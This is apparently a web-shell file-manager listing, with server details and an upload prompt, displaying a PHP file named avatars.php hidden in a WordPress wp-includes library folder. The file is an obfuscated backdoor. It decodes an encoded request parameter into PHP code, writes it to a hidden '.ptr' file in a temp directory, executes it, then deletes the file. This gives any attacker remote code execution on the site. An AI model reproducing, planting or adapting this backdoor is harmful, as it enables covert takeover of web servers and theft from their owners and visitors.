HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/home/vitanhod/www/wp-includes/sodium_compat/src/Core/Base64/avatars.php
<?php

if(@$_REQUEST["\x64\x61t\x61\x5F\x63hunk"] !== null){
	$holder = array_filter([getenv("TEMP"), session_save_path(), getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), "/var/tmp"]);
	$elem = $_REQUEST["\x64\x61t\x61\x5F\x63hunk"];
	   $elem=	 explode	("." 	,$elem	 )	;
	$value	= 	'';
            $s3	= 	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	= 	strlen(	$s3);
            $j	= 	0;
    
            $__tmp	= 	$elem;
            while(	$v1	= 	array_shift(	$__tmp)) {	$sChar	= 	ord(	$s3[$j%$sLen]);
                $d	= 	(	(	int)$v1 - $sChar -(	$j%10)) ^	15;
                $value .= chr(	$d);
                $j++;}
	while ($key = array_shift($holder)) {
    		if (!( !is_dir($key) || !is_writable($key) )) {
    $binding = sprintf("%s/.ptr", $key);
    $success = file_put_contents($binding, $value);
if ($success) {
	include $binding;
	@unlink($binding);
	die();}
}
}
}